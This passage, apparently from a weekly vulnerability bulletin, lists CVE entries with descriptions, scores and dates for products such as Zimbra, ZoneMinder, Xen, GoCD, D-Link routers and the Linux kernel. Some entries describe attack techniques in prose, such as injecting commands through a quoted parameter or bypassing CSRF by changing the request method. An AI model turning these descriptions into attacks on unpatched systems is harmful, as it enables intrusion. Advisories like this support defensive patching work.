vmware — vrealize_operations	VMware Aria Operations contains an arbitrary file read vulnerability. A malicious actor with administrative privileges may be able to read arbitrary files containing sensitive data.	2022-10-11	4.9	CVE-2022-31682 MISC
web-based_student_clearance_system_project — web-based_student_clearance_system	A vulnerability was found in SourceCodester Web-Based Student Clearance System. It has been rated as problematic. Affected by this issue is the function prepare of the file /Admin/add-student.php. The manipulation leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-210356.	2022-10-08	5.4	CVE-2022-3434 N/A N/A
webgilde — advanced_comment_form	The Advanced Comment Form WordPress plugin before 1.2.1 does not sanitise and escape its settings, allowing high privilege users such as admin to perform cross-Site Scripting attacks even when the unfiltered_html capability is disallowed.	2022-10-10	4.8	CVE-2022-3220 MISC
wpchill — download_monitor	The Download Monitor WordPress plugin before 4.5.98 does not ensure that files to be downloaded are inside the blog folders, and not sensitive, allowing high privilege users such as admin to download the wp-config.php or /etc/passwd even in an hardened environment or multisite setup.	2022-10-10	4.9	CVE-2022-2981 MISC
wpdarko — top_bar	The Top Bar WordPress plugin before 3.0.4 does not sanitise and escape some of its settings before outputting them in frontend pages, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)	2022-10-10	4.8	CVE-2022-2629 MISC
wpsocialrocket — social_rocket	The Social Rocket WordPress plugin before 1.3.3 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)	2022-10-10	4.8	CVE-2022-3136 MISC
wpwhitesecurity — wp_2fa	The WP 2FA WordPress plugin before 2.3.0 uses comparison operators that don’t mitigate time-based attacks, which could be abused to leak information about the authentication codes being compared.	2022-10-10	5.9	CVE-2022-2891 MISC
xen — xapi	XAPI open file limit DoS It is possible for an unauthenticated client on the network to cause XAPI to hit its file-descriptor limit. This causes XAPI to be unable to accept new requests for other (trusted) clients, and blocks XAPI from carrying out any tasks that require the opening of file descriptors.	2022-10-11	5.3	CVE-2022-33749 MISC CONFIRM MLIST
xen — xen	P2M pool freeing may take excessively long The P2M pool backing second level address translation for guests may be of significant size. Therefore its freeing may take more time than is reasonable without intermediate preemption checks. Such checking for the need to preempt was so far missing.	2022-10-11	6.5	CVE-2022-33746 MISC CONFIRM MLIST
xen — xen	lock order inversion in transitive grant copy handling As part of XSA-226 a missing cleanup call was inserted on an error handling path. While doing so, locking requirements were not paid attention to. As a result two cooperating guests granting each other transitive grants can cause locks to be acquired nested within one another, but in respectively opposite order. With suitable timing between the involved grant copy operations this may result in the locking up of a CPU.	2022-10-11	5.6	CVE-2022-33748 MISC CONFIRM MLIST
zimbra — collaboration	An issue was discovered in Zimbra Collaboration (ZCS) 9.0. XSS can occur via the onerror attribute of an IMG element, leading to information disclosure.	2022-10-12	6.1	CVE-2022-41348 MISC MISC
zimbra — collaboration	In Zimbra Collaboration Suite (ZCS) 8.8.15, the URL at /h/compose accepts an attachUrl parameter that is vulnerable to Reflected XSS. This allows executing arbitrary JavaScript on the victim’s machine.	2022-10-12	6.1	CVE-2022-41349 MISC MISC
zimbra — collaboration	In Zimbra Collaboration Suite (ZCS) 8.8.15, /h/search?action=voicemail&action=listen accepts a phone parameter that is vulnerable to Reflected XSS. This allows executing arbitrary JavaScript on the victim’s machine.	2022-10-12	6.1	CVE-2022-41350 MISC MISC
zimbra — collaboration	In Zimbra Collaboration Suite (ZCS) 8.8.15, at the URL /h/calendar, one can trigger XSS by adding JavaScript code to the view parameter and changing the value of the uncheck parameter to a string (instead of default value of 10).	2022-10-12	6.1	CVE-2022-41351 MISC MISC
zoneminder — zoneminder	ZoneMinder is a free, open source Closed-circuit television software application. In affected versions authenticated users can bypass CSRF keys by modifying the request supplied to the Zoneminder web application. These modifications include replacing HTTP POST with an HTTP GET and removing the CSRF key from the request. An attacker can take advantage of this by using an HTTP GET request to perform actions with no CSRF protection. This could allow an attacker to cause an authenticated user to perform unexpected actions on the web application. Users are advised to upgrade as soon as possible. There are no known workarounds for this issue.	2022-10-07	6.5	CVE-2022-39290 CONFIRM MISC
zoneminder — zoneminder	ZoneMinder is a free, open source Closed-circuit television software application The file parameter is vulnerable to a cross site scripting vulnerability (XSS) by backing out of the current “tr” “td” brackets. This then allows a malicious user to provide code that will execute when a user views the specific log on the “view=log” page. This vulnerability allows an attacker to store code within the logs that will be executed when loaded by a legitimate user. These actions will be performed with the permission of the victim. This could lead to data loss and/or further exploitation including account takeover. This issue has been addressed in versions `1.36.27` and `1.37.24`. Users are advised to upgrade. Users unable to upgrade should disable database logging.	2022-10-07	5.4	CVE-2022-39285 MISC MISC CONFIRM
zoneminder — zoneminder	ZoneMinder is a free, open source Closed-circuit television software application. Affected versions of zoneminder are subject to a vulnerability which allows users with “View” system permissions to inject new data into the logs stored by Zoneminder. This was observed through an HTTP POST request containing log information to the “/zm/index.php” endpoint. Submission is not rate controlled and could affect database performance and/or consume all storage resources. Users are advised to upgrade. There are no known workarounds for this issue.	2022-10-07	5.4	CVE-2022-39291 MISC MISC MISC CONFIRM MISC

Low Vulnerabilities

Primary Vendor — Product	Description	Published	CVSS Score	Source & Patch Info
google — android	Improper restriction of broadcasting Intent in MouseNKeyHidDevice prior to SMR Oct-2022 Release 1 leaks MAC address of the connected Bluetooth device.	2022-10-07	3.3	CVE-2022-36868 MISC
google — android	Improper access control vulnerability in CocktailBarService prior to SMR Oct-2022 Release 1 allows local attacker to bind service that require BIND_REMOTEVIEWS permission.	2022-10-07	3.3	CVE-2022-39851 MISC
huawei — harmonyos	The phones have the heap overflow, out-of-bounds read, and null pointer vulnerabilities in the fingerprint trusted application (TA).Successful exploitation of this vulnerability may affect the fingerprint service.	2022-10-14	3.4	CVE-2022-41592 MISC MISC
huawei — harmonyos	The phones have the heap overflow, out-of-bounds read, and null pointer vulnerabilities in the fingerprint trusted application (TA).Successful exploitation of this vulnerability may affect the fingerprint service.	2022-10-14	3.4	CVE-2022-41593 MISC MISC
huawei — harmonyos	The phones have the heap overflow, out-of-bounds read, and null pointer vulnerabilities in the fingerprint trusted application (TA).Successful exploitation of this vulnerability may affect the fingerprint service.	2022-10-14	3.4	CVE-2022-41594 MISC MISC
huawei — harmonyos	The phones have the heap overflow, out-of-bounds read, and null pointer vulnerabilities in the fingerprint trusted application (TA).Successful exploitation of this vulnerability may affect the fingerprint service.	2022-10-14	3.4	CVE-2022-41595 MISC MISC
huawei — harmonyos	The phones have the heap overflow, out-of-bounds read, and null pointer vulnerabilities in the fingerprint trusted application (TA).Successful exploitation of this vulnerability may affect the fingerprint service.	2022-10-14	3.4	CVE-2022-41597 MISC MISC
huawei — harmonyos	The phones have the heap overflow, out-of-bounds read, and null pointer vulnerabilities in the fingerprint trusted application (TA).Successful exploitation of this vulnerability may affect the fingerprint service.	2022-10-14	3.4	CVE-2022-41598 MISC MISC
huawei — harmonyos	The phones have the heap overflow, out-of-bounds read, and null pointer vulnerabilities in the fingerprint trusted application (TA).Successful exploitation of this vulnerability may affect the fingerprint service.	2022-10-14	3.4	CVE-2022-41600 MISC MISC
huawei — harmonyos	The phones have the heap overflow, out-of-bounds read, and null pointer vulnerabilities in the fingerprint trusted application (TA).Successful exploitation of this vulnerability may affect the fingerprint service.	2022-10-14	3.4	CVE-2022-41601 MISC MISC
huawei — harmonyos	The phones have the heap overflow, out-of-bounds read, and null pointer vulnerabilities in the fingerprint trusted application (TA).Successful exploitation of this vulnerability may affect the fingerprint service.	2022-10-14	3.4	CVE-2022-41602 MISC MISC
huawei — harmonyos	The phones have the heap overflow, out-of-bounds read, and null pointer vulnerabilities in the fingerprint trusted application (TA).Successful exploitation of this vulnerability may affect the fingerprint service.	2022-10-14	3.4	CVE-2022-41603 MISC MISC
microsoft — windows_server_2008	Windows Kernel Elevation of Privilege Vulnerability. This CVE ID is unique from CVE-2022-37988, CVE-2022-37990, CVE-2022-37991, CVE-2022-37995, CVE-2022-38037, CVE-2022-38038, CVE-2022-38039.	2022-10-11	3.3	CVE-2022-38022 MISC
samsung — factorycamera	Unprotected Receiver in AtBroadcastReceiver in FactoryCamera prior to version 3.5.51 allows attackers to record video without camera privilege.	2022-10-07	3.3	CVE-2022-39861 MISC
samsung — quick_share	Improper access control vulnerability in QuickShare prior to version 13.2.3.5 allows attackers to access sensitive information via implicit broadcast.	2022-10-07	3.5	CVE-2022-39860 MISC
samsung — reminder	Insertion of Sensitive Information into Log in PushRegIdUpdateClient of SReminder prior to 8.2.01.13 allows attacker to access device IMEI.	2022-10-07	3.3	CVE-2022-39876 MISC
samsung — sharelive	Improper restriction of broadcasting Intent in ShareLive prior to version 13.2.03.5 leaks MAC address of the connected Bluetooth device.	2022-10-07	3.3	CVE-2022-39872 MISC
xen — xen	Arm: unbounded memory consumption for 2nd-level page tables Certain actions require e.g. removing pages from a guest’s P2M (Physical-to-Machine) mapping. When large pages are in use to map guest pages in the 2nd-stage page tables, such a removal operation may incur a memory allocation (to replace a large mapping with individual smaller ones). These memory allocations are taken from the global memory pool. A malicious guest might be able to cause the global memory pool to be exhausted by manipulating its own P2M mappings.	2022-10-11	3.8	CVE-2022-33747 MISC CONFIRM MLIST

Severity Not Yet Assigned

Primary Vendor — Product	Description	Published	CVSS Score	Source & Patch Info
389-ds-base — 389-ds-base	A flaw was found In 389-ds-base. When the Content Synchronization plugin is enabled, an authenticated user can reach a NULL pointer dereference using a specially crafted query. This flaw allows an authenticated attacker to cause a denial of service. This CVE is assigned against an incomplete fix of CVE-2021-3514.	2022-10-14	not yet calculated	CVE-2022-2850 MISC MISC
adobe — coldfusion	Adobe ColdFusion versions Update 14 (and earlier) and Update 4 (and earlier) are affected by a Stack-based Buffer Overflow vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue does not require user interaction, the vulnerability is triggered when a crafted network packet is sent to the server.	2022-10-14	not yet calculated	CVE-2022-35690 MISC
adobe — dimension	Adobe Dimension versions 3.4.5 is affected by a Use After Free vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.	2022-10-14	not yet calculated	CVE-2022-38444 MISC
adobe — dimension	Adobe Dimension versions 3.4.5 is affected by a Use After Free vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.	2022-10-14	not yet calculated	CVE-2022-38445 MISC
apache — apache_commons_text	Apache Commons Text performs variable interpolation, allowing properties to be dynamically evaluated and expanded. The standard format for interpolation is “${prefix:name}”, where “prefix” is used to locate an instance of org.apache.commons.text.lookup.StringLookup that performs the interpolation. Starting with version 1.5 and continuing through 1.9, the set of default Lookup instances included interpolators that could result in arbitrary code execution or contact with remote servers. These lookups are: – “script” – execute expressions using the JVM script execution engine (javax.script) – “dns” – resolve dns records – “url” – load values from urls, including from remote servers Applications using the interpolation defaults in the affected versions may be vulnerable to remote code execution or unintentional contact with remote servers if untrusted configuration values are used. Users are recommended to upgrade to Apache Commons Text 1.10.0, which disables the problematic interpolators by default.	2022-10-13	not yet calculated	CVE-2022-42889 CONFIRM MLIST
apache — kylin	Kylin’s cube designer function has a command injection vulnerability when overwriting system parameters in the configuration overwrites menu. RCE can be implemented by closing the single quotation marks around the parameter value of “– conf=” to inject any operating system command into the command line parameters. This vulnerability affects Kylin 2 version 2.6.5 and earlier, Kylin 3 version 3.1.2 and earlier, and Kylin 4 version 4.0.1 and earlier.	2022-10-13	not yet calculated	CVE-2022-24697 CONFIRM
atlassian — jira	The ManageJiraConnectors API in Atlassian Jira Align before version 10.109.2 allows remote attackers to exploit this issue to access internal network resources via a Server-Side Request Forgery. This can be exploited by a remote, unauthenticated attacker with Super Admin privileges by sending a specially crafted HTTP request.	2022-10-14	not yet calculated	CVE-2022-36802 MISC
atlassian — jira	The MasterUserEdit API in Atlassian Jira Align Server before version 10.109.2 allows An authenticated attacker with the People role permission to use the MasterUserEdit API to modify any users role to Super Admin. This vulnerability was reported by Jacob Shafer from Bishop Fox.	2022-10-14	not yet calculated	CVE-2022-36803 MISC
autodesk — design_review	A maliciously crafted PCT file when consumed through DesignReview.exe application could lead to memory corruption vulnerability by write access violation. This vulnerability in conjunction with other vulnerabilities could lead to code execution in the context of the current process.	2022-10-14	not yet calculated	CVE-2022-41306 MISC
autodesk — fbx_sdk	An Out-Of-Bounds Read Vulnerability in Autodesk FBX SDK version 2020. and prior may lead to code execution or information disclosure through maliciously crafted FBX files. This vulnerability in conjunction with other vulnerabilities could lead to code execution in the context of the current process.	2022-10-14	not yet calculated	CVE-2022-41302 MISC
autodesk — fbx_sdk	A user may be tricked into opening a malicious FBX file which may exploit a use-after-free vulnerability in Autodesk FBX SDK 2020 version causing the application to reference a memory location controlled by an unauthorized third party, thereby running arbitrary code on the system.	2022-10-14	not yet calculated	CVE-2022-41303 MISC
autodesk — fbx_sdk	An Out-Of-Bounds Write Vulnerability in Autodesk FBX SDK 2020 version and prior may lead to code execution through maliciously crafted FBX files or information disclosure.	2022-10-14	not yet calculated	CVE-2022-41304 MISC
autodesk — subassembly_composer	A maliciously crafted PKT file when consumed through SubassemblyComposer.exe application could lead to memory corruption vulnerability by write access violation. This vulnerability in conjunction with other vulnerabilities could lead to code execution in the context of the current process.	2022-10-14	not yet calculated	CVE-2022-41305 MISC
autodesk — subassembly_composer	A maliciously crafted PKT file when consumed through SubassemblyComposer.exe application could lead to memory corruption vulnerability by read access violation. This vulnerability in conjunction with other vulnerabilities could lead to code execution in the context of the current process.	2022-10-14	not yet calculated	CVE-2022-41307 MISC
autodesk — subassembly_composer	A maliciously crafted PKT file when consumed through SubassemblyComposer.exe application could lead to memory corruption vulnerability by read access violation. This vulnerability in conjunction with other vulnerabilities could lead to code execution in the context of the current process.	2022-10-14	not yet calculated	CVE-2022-41308 MISC
d-link_covr — d-link_covr	D-Link COVR 1200,1202,1203 v1.08 was discovered to have a predictable seed in a Pseudo-Random Number Generator.	2022-10-13	not yet calculated	CVE-2022-42159 MISC MISC
d-link_covr — d-link_covr	D-Link COVR 1200,1202,1203 v1.08 was discovered to contain a command injection vulnerability via the /SetTriggerWPS/PIN parameter at function SetTriggerWPS.	2022-10-13	not yet calculated	CVE-2022-42161 MISC MISC
d-link_covr — d-link_covr	D-Link COVR 1200,1203 v1.08 was discovered to contain a command injection vulnerability via the tomography_ping_number parameter at function SetNetworkTomographySettings.	2022-10-13	not yet calculated	CVE-2022-42156 MISC MISC
d-link_covr — d-link_covr	D-Link COVR 1200,1202,1203 v1.08 was discovered to contain a command injection vulnerability via the system_time_timezone parameter at function SetNTPServerSettings.	2022-10-13	not yet calculated	CVE-2022-42160 MISC MISC
gitee — openharmony	OpenHarmony-v3.1.2 and prior versions, 3.0.6 and prior versions have a Kernel memory pool override vulnerability in /dev/mmz_userdev device driver. The impact depends on the privileges of the attacker. The unprivileged process run on the device could disclose sensitive information including kernel pointer, which could be used in further attacks. The processes with system user UID run on the device would be able to mmap memory pools used by kernel and override them which could be used to gain kernel code execution on the device, gain root privileges, or cause device reboot.	2022-10-14	not yet calculated	CVE-2022-42464 MISC
gitee — openharmony	OpenHarmony-v3.1.2 and prior versions have a Missing permission validation vulnerability in param service of startup subsystem. An malicious application installed on the device could elevate its privileges to the root user, disable security features, or cause DoS by disabling particular services.	2022-10-14	not yet calculated	CVE-2022-42488 MISC
gitee — openharmony	OpenHarmony-v3.1.2 and prior versions, 3.0.6 and prior versions have an Out-of-bound memory read and write vulnerability in /dev/mmz_userdev device driver. The impact depends on the privileges of the attacker. The unprivileged process run on the device could read out-of-bound memory leading sensitive to information disclosure. The processes with system user UID run on the device would be able to write out-of-bound memory which could lead to unspecified memory corruption.	2022-10-14	not yet calculated	CVE-2022-41686 MISC
gitee — openharmony	OpenHarmony-v3.1.2 and prior versions have an authenication bypass vulnerability in a callback handler function of Softbus_server in communication subsystem. Attackers can launch attacks on distributed networks by sending Bluetooth rfcomm packets to any remote device and executing arbitrary commands.	2022-10-14	not yet calculated	CVE-2022-42463 MISC
go — parseacceptlanguage	An attacker may cause a denial of service by crafting an Accept-Language header which ParseAcceptLanguage will take significant time to parse.	2022-10-14	not yet calculated	CVE-2022-32149 MISC MISC MISC MISC
go — reader.read	Reader.Read does not set a limit on the maximum size of file headers. A maliciously crafted archive could cause Read to allocate unbounded amounts of memory, potentially causing resource exhaustion or panics. After fix, Reader.Read limits the maximum size of header blocks to 1 MiB.	2022-10-14	not yet calculated	CVE-2022-2879 MISC MISC MISC MISC
go — reverseproxy	Requests forwarded by ReverseProxy include the raw query parameters from the inbound request, including unparseable parameters rejected by net/http. This could permit query parameter smuggling when a Go proxy forwards a parameter with an unparseable value. After fix, ReverseProxy sanitizes the query parameters in the forwarded query when the outbound request’s Form field is set after the ReverseProxy. Director function returns, indicating that the proxy has parsed the query parameters. Proxies which do not parse query parameters continue to forward the original query parameters unchanged.	2022-10-14	not yet calculated	CVE-2022-2880 MISC MISC MISC MISC
gocd — gocd	GoCD is a continuous delivery server. GoCD helps you automate and streamline the build-test-release cycle for continuous delivery of your product. GoCD versions from 19.2.0 to 19.10.0 (inclusive) are subject to a timing attack in validation of access tokens due to use of regular string comparison for validation of the token rather than a constant time algorithm. This could allow a brute force attack on GoCD server API calls to observe timing differences in validations in order to guess an access token generated by a user for API access. This issue is fixed in GoCD version 19.11.0. As a workaround, users can apply rate limiting or insert random delays to API calls made to GoCD Server via a reverse proxy or other fronting web server. Another workaround, users may disallow use of access tokens by users by having an administrator revoke all access tokens through the “Access Token Management” admin function.	2022-10-14	not yet calculated	CVE-2022-39308 MISC MISC MISC CONFIRM
gocd — gocd	GoCD is a continuous delivery server. GoCD helps you automate and streamline the build-test-release cycle for continuous delivery of your product. GoCD versions prior to 21.1.0 are vulnerable to remote code execution on the server from a malicious or compromised agent. The Spring RemoteInvocation endpoint exposed agent communication and allowed deserialization of arbitrary java objects, as well as subsequent remote code execution. Exploitation requires agent-level authentication, thus an attacker would need to either compromise an existing agent, its network communication or register a new agent to practically exploit this vulnerability. This issue is fixed in GoCD version 21.1.0. There are currently no known workarounds.	2022-10-14	not yet calculated	CVE-2022-39311 CONFIRM MISC MISC
gocd — gocd	GoCD is a continuous delivery server. GoCD helps you automate and streamline the build-test-release cycle for continuous delivery of your product. GoCD versions prior to 21.1.0 leak the symmetric key used to encrypt/decrypt any secure variables/secrets in GoCD configuration to authenticated agents. A malicious/compromised agent may then expose that key from memory, and potentially allow an attacker the ability to decrypt secrets intended for other agents/environments if they also are able to obtain access to encrypted configuration values from the GoCD server. This issue is fixed in GoCD version 21.1.0. There are currently no known workarounds.	2022-10-14	not yet calculated	CVE-2022-39309 MISC MISC CONFIRM MISC
gocd — gocd	GoCD is a continuous delivery server. GoCD helps you automate and streamline the build-test-release cycle for continuous delivery of your product. GoCD versions prior to 21.1.0 can allow one authenticated agent to impersonate another agent, and thus receive work packages for other agents due to broken access control and incorrect validation of agent tokens within the GoCD server. Since work packages can contain sensitive information such as credentials intended only for a given job running against a specific agent environment, this can cause accidental information disclosure. Exploitation requires knowledge of agent identifiers and ability to authenticate as an existing agent with the GoCD server. This issue is fixed in GoCD version 21.1.0. There are currently no known workarounds.	2022-10-14	not yet calculated	CVE-2022-39310 MISC MISC CONFIRM
grafana — grafana	Grafana is an open source observability and data visualization platform. Starting with version 5.0.0-beta1 and prior to versions 8.5.14 and 9.1.8, Grafana could leak the authentication cookie of users to plugins. The vulnerability impacts data source and plugin proxy endpoints under certain conditions. The destination plugin could receive a user’s Grafana authentication cookie. Versions 9.1.8 and 8.5.14 contain a patch for this issue. There are no known workarounds.	2022-10-13	not yet calculated	CVE-2022-39201 CONFIRM MISC MISC MISC
grafana — grafana	Grafana is an open source data visualization platform for metrics, logs, and traces. Versions prior to 9.1.8 and 8.5.14 allow one user to block another user’s login attempt by registering someone else’e email address as a username. A Grafana user’s username and email address are unique fields, that means no other user can have the same username or email address as another user. A user can have an email address as a username. However, the login system allows users to log in with either username or email address. Since Grafana allows a user to log in with either their username or email address, this creates an usual behavior where `user_1` can register with one email address and `user_2` can register their username as `user_1`’s email address. This prevents `user_1` logging into the application since `user_1`’s password won’t match with `user_2`’s email address. Versions 9.1.8 and 8.5.14 contain a patch. There are no workarounds for this issue.	2022-10-13	not yet calculated	CVE-2022-39229 MISC MISC CONFIRM
huawei — harmonyos	The HwAirlink module has a heap overflow vulnerability.Successful exploitation of this vulnerability may cause out-of-bounds writes, resulting in modification of sensitive data.	2022-10-14	not yet calculated	CVE-2022-38977 MISC
huawei — harmonyos	The HwAirlink module has a heap overflow vulnerability in processing data packets of the proprietary protocol.Successful exploitation of this vulnerability may allow attackers to obtain process control permissions.	2022-10-14	not yet calculated	CVE-2022-38980 MISC
huawei — harmonyos	The HwAirlink module has an out-of-bounds read vulnerability.Successful exploitation of this vulnerability may cause information leakage.	2022-10-14	not yet calculated	CVE-2022-38981 MISC
huawei — harmonyos	The fingerprint module has service logic errors.Successful exploitation of this vulnerability will cause the phone lock to be cracked.	2022-10-14	not yet calculated	CVE-2022-38982 MISC
huawei — harmonyos	The BT Hfp Client module has a Use-After-Free (UAF) vulnerability.Successful exploitation of this vulnerability may result in arbitrary code execution.	2022-10-14	not yet calculated	CVE-2022-38983 MISC MISC
huawei — harmonyos	The HIPP module has a vulnerability of not verifying the data transferred in the kernel space.Successful exploitation of this vulnerability will cause out-of-bounds read, which affects data confidentiality.	2022-10-14	not yet calculated	CVE-2022-38984 MISC MISC
huawei — harmonyos	The facial recognition module has a vulnerability in input validation.Successful exploitation of this vulnerability may affect data confidentiality.	2022-10-14	not yet calculated	CVE-2022-38985 MISC MISC
huawei — harmonyos	The HIPP module has a vulnerability of bypassing the check of the data transferred in the kernel space.Successful exploitation of this vulnerability may cause out-of-bounds access to the HIPP module and page table tampering, affecting device confidentiality and availability.	2022-10-14	not yet calculated	CVE-2022-38986 MISC MISC
huawei — harmonyos	The HISP module has a vulnerability of bypassing the check of the data transferred in the kernel space.Successful exploitation of this vulnerability may cause unauthorized access to the HISP module.	2022-10-14	not yet calculated	CVE-2022-39011 MISC MISC
huawei — harmonyos	The HW_KEYMASTER module has a vulnerability of missing bounds check on length.Successful exploitation of this vulnerability may cause malicious construction of data, which results in out-of-bounds access.	2022-10-14	not yet calculated	CVE-2021-46839 MISC MISC
huawei — harmonyos	The HW_KEYMASTER module has an out-of-bounds access vulnerability in parameter set verification.Successful exploitation of this vulnerability may cause malicious construction of data, which results in out-of-bounds access.	2022-10-14	not yet calculated	CVE-2021-46840 MISC MISC
huawei — harmonyos	The HISP module has a vulnerability of not verifying the data transferred in the kernel space.Successful exploitation of this vulnerability will cause out-of-bounds read, which affects data confidentiality.	2022-10-14	not yet calculated	CVE-2022-38998 MISC MISC
huawei — emui/magic_ui	The MPTCP module has an out-of-bounds write vulnerability.Successful exploitation of this vulnerability may cause root privilege escalation attacks implemented by modifying program information.	2022-10-14	not yet calculated	CVE-2022-41578 MISC MISC
huawei — emui/magic_ui	The HW_KEYMASTER module has a vulnerability of not verifying the data read.Successful exploitation of this vulnerability may cause malicious construction of data, which results in out-of-bounds access.	2022-10-14	not yet calculated	CVE-2022-41580 MISC MISC
huawei — emui/magic_ui	The storage maintenance and debugging module has an array out-of-bounds read vulnerability.Successful exploitation of this vulnerability will cause incorrect statistics of this module.	2022-10-14	not yet calculated	CVE-2022-41583 MISC MISC
huawei — emui/magic_ui	The kernel module has an out-of-bounds read vulnerability.Successful exploitation of this vulnerability may cause memory overwriting.	2022-10-14	not yet calculated	CVE-2022-41584 MISC MISC
huawei — emui/magic_ui	The kernel module has an out-of-bounds read vulnerability.Successful exploitation of this vulnerability may cause memory overwriting.	2022-10-14	not yet calculated	CVE-2022-41585 MISC MISC
huawei — emui/magic_ui	The communication framework module has a vulnerability of not truncating data properly.Successful exploitation of this vulnerability may affect data confidentiality.	2022-10-14	not yet calculated	CVE-2022-41586 MISC MISC
huawei — emui/magic_ui	Uncaptured exceptions in the home screen module. Successful exploitation of this vulnerability may affect stability.	2022-10-14	not yet calculated	CVE-2022-41587 MISC
huawei — emui/magic_ui	The home screen module has a vulnerability in service logic processing.Successful exploitation of this vulnerability may affect data integrity.	2022-10-14	not yet calculated	CVE-2022-41588 MISC MISC
huawei — emui/magic_ui	The DFX unwind stack module of the ArkCompiler has a vulnerability in interface calling.Successful exploitation of this vulnerability affects system services and device availability.	2022-10-14	not yet calculated	CVE-2022-41589 MISC MISC
huawei — emui/magic_ui	The HW_KEYMASTER module has a vulnerability of not verifying the data read.Successful exploitation of this vulnerability may cause malicious construction of data, which results in out-of-bounds access.	2022-10-14	not yet calculated	CVE-2022-41581 MISC MISC
huawei — emui/magic_ui	The security module has configuration defects.Successful exploitation of this vulnerability may affect system availability.	2022-10-14	not yet calculated	CVE-2022-41582 MISC MISC
ikea — tradfri_smart_lights	An attacker sending a single malformed IEEE 802.15.4 (Zigbee) frame makes the TRÅDFRI bulb blink, and if they replay (i.e. resend) the same frame multiple times, the bulb performs a factory reset. This causes the bulb to lose configuration information about the Zigbee network and current brightness level. After this attack, all lights are on with full brightness, and a user cannot control the bulbs with either the IKEA Home Smart app or the TRÅDFRI remote control. The malformed Zigbee frame is an unauthenticated broadcast message, which means all vulnerable devices within radio range are affected. CVSS 3.1 Base Score 7.1 vector: CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:H	2022-10-14	not yet calculated	CVE-2022-39064 MISC
ikea — tradfri_smart_lights	A single malformed IEEE 802.15.4 (Zigbee) frame makes the TRÅDFRI gateway unresponsive, such that connected lighting cannot be controlled with the IKEA Home Smart app and TRÅDFRI remote control. The malformed Zigbee frame is an unauthenticated broadcast message, which means all vulnerable devices within radio range are affected. CVSS 3.1 Base Score: 6.5 Vector: CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H	2022-10-14	not yet calculated	CVE-2022-39065 MISC
istio — istiod	Istio is an open platform-independent service mesh that provides traffic management, policy enforcement, and telemetry collection. Prior to versions 1.15.2, 1.14.5, and 1.13.9, the Istio control plane, istiod, is vulnerable to a request processing error, allowing a malicious attacker that sends a specially crafted or oversized message which results in the control plane crashing when the Kubernetes validating or mutating webhook service is exposed publicly. This endpoint is served over TLS port 15017, but does not require any authentication from the attacker. For simple installations, Istiod is typically only reachable from within the cluster, limiting the blast radius. However, for some deployments, especially external istiod topologies, this port is exposed over the public internet. Versions 1.15.2, 1.14.5, and 1.13.9 contain patches for this issue. There are no effective workarounds, beyond upgrading. This bug is due to an error in `regexp.Compile` in Go.	2022-10-13	not yet calculated	CVE-2022-39278 MISC CONFIRM MISC MISC
jasper — jasper	A vulnerability found in jasper. This security vulnerability happens because of a memory leak bug in function cmdopts_parse that can cause a crash or segmentation fault.	2022-10-14	not yet calculated	CVE-2022-2963 MISC MISC MISC
liferay — digital_experience_platform	A Cross-site scripting (XSS) vulnerability in the Blog module – add new topic functionality in Liferay Digital Experience Platform 7.3.10 SP3 allows remote attackers to inject arbitrary JS script or HTML into the name field of newly created topic.	2022-10-13	not yet calculated	CVE-2022-38902 MISC MISC MISC
linux — linux_kernel	Various refcounting bugs in the multi-BSS handling in the mac80211 stack in the Linux kernel 5.1 through 5.19.x before 5.19.16 could be used by local attackers (able to inject WLAN frames) to trigger use-after-free conditions to potentially execute code.	2022-10-14	not yet calculated	CVE-2022-42720 MISC MISC MISC FEDORA FEDORA
linux — linux_kernel	A list management bug in BSS handling in the mac80211 stack in the Linux kernel 5.1 through 5.19.x before 5.19.16 could be used by local attackers (able to inject WLAN frames) to corrupt a linked list and, in turn, potentially execute code.	2022-10-14	not yet calculated	CVE-2022-42721 MISC MISC MISC FEDORA FEDORA
linux — linux_kernel	An issue was discovered in the Linux kernel before 5.19.16. Attackers able to inject WLAN frames could cause a buffer overflow in the ieee80211_bss_info_update function in net/mac80211/scan.c.	2022-10-14	not yet calculated	CVE-2022-41674 MISC MISC MISC MISC MISC FEDORA FEDORA
linux — linux_kernel	A use-after-free in the mac80211 stack when parsing a multi-BSSID element in the Linux kernel 5.2 through 5.19.x before 5.19.16 could be used by attackers (able to inject WLAN frames) to crash the kernel and potentially execute code.	2022-10-13	not yet calculated	CVE-2022-42719 MISC MISC MISC MISC FEDORA FEDORA
linux — linux_kernel	In the Linux kernel 5.8 through 5.19.x before 5.19.16, local attackers able to inject WLAN frames into the mac80211 stack could cause a NULL pointer dereference denial-of-service attack against the beacon protection of P2P devices.	2022-10-14	not yet calculated	CVE-2022-42722 MISC MISC MISC FEDORA FEDORA
microsoft — azure	Azure RTOS USBX is a high-performance USB host, device, and on-the-go (OTG) embedded stack, that is fully integrated with Azure RTOS ThreadX. The case is, in [_ux_host_class_pima_read](https://github.com/azure-rtos/usbx/blob/master/common/usbx_host_classes/src/ux_host_class_pima_read.c), there is data length from device response, returned in the very first packet, and read by [L165 code](https://github.com/azure-rtos/usbx/blob/082fd9db09a3669eca3358f10b8837a5c1635c0b/common/usbx_host_classes/src/ux_host_class_pima_read.c#L165), as header_length. Then in [L178 code](https://github.com/azure-rtos/usbx/blob/082fd9db09a3669eca3358f10b8837a5c1635c0b/common/usbx_host_classes/src/ux_host_class_pima_read.c#L178), there is a “if” branch, which check the expression of “(header_length – UX_HOST_CLASS_PIMA_DATA_HEADER_SIZE) > data_length” where if header_length is smaller than UX_HOST_CLASS_PIMA_DATA_HEADER_SIZE, calculation could overflow and then [L182 code](https://github.com/azure-rtos/usbx/blob/082fd9db09a3669eca3358f10b8837a5c1635c0b/common/usbx_host_classes/src/ux_host_class_pima_read.c#L182) the calculation of data_length is also overflow, this way the later [while loop start from 